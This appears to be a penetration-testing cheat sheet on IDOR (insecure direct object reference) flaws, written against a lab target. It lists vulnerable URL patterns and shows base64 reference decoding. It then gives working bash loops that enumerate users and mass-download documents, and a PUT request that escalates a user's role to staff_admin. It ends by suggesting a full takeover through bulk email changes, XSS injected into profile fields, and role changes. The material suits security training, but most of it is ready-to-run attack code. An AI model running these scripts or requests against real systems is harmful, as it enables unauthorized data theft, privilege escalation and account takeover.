Methodology
Identifying Object References
Look for URLs, forms, or APIs that reference internal objects directly. Common patterns:
/my-account?id=wiener
/blogs?userId=773fea0b-d694-496b-974b-4ae2b8d8cc9c
/user?id=123
/profile?id=wiener
/account/456
/message?id=90210
/email?id=105
/ticket/view?ticketId=320
/download?file=invoice-002.pdf
/file?id=resume123.docx
/document/8756
/order?id=31415
/checkout?orderId=1234
/invoice?id=980
/admin/upgrade-user?id=2
/update-role?userId=773
/post?postId=89
/comment/delete?commentId=2048
/logs?user=admin
/audit?id=777
When References Are Encoded
If object references are hashed or encoded (e.g., base64, md5, URL encoding), understand the encoding method and reverse it.
Common encoded parameters:
Example:
GET /download.php?contract=MQ%3D%3D
Base64-decode: MQ== → 1
Mass Enumeration Example
for x in {1..10}; do
curl -s -X POST 'http://HOST/documents.php' -d "uid=$x" | grep -oP "/documents/\\K\\w*\\.\\w*"
done
Download Exploitation Script
#!/bin/bash
url='http://HOST:PORT/download.php?contract='
for i in {1..30}; do
value=$(echo -n $i | base64 -w0 | jq -sRr @uri)
filename=$(curl -s -I "$url$value" | grep -oP 'filename=\\"\\K\\w+\\.\\w*')
wget -q "$url$value" -O "$filename"
done
Exploiting Insecure APIs
Step 1: User Enumeration
for x in {1..30}; do
curl -s -X GET "http://HOST/profile/api.php/profile/$x" | jq
done
Sample output:
{
"uid": "10",
"uuid": "bfd92386a1b48076792e68b596846499",
"role": "staff_admin",
"full_name": "admin",
"email": "admin@employees.htb"
}
Step 2: Escalation via Insecure Function Calls (PUT)
PUT /profile/api.php/profile/1 HTTP/1.1
Host: 83.136.253.171:45444
Cookie: role=employee
Content-Type: application/json
{
"uid": 1,
"uuid": "40f5888b67c748df7efba008e7c2f9d2",
"role": "staff_admin",
"full_name": "Adrian Morales",
"email": "Intrusionz3r0@employees.htb",
"about": "<h1>Hola</h1>"
}
This allows privilege escalation by overwriting the role field.
Combining Leaks + Writes = Complete Takeover
First, enumerate user data (UUIDs, roles, etc.).
Then, modify those values via IDOR-vulnerable PUT endpoints.
You can:
Change all users’ emails to one you control.
Inject XSS in about fields.
Change user roles in bulk.
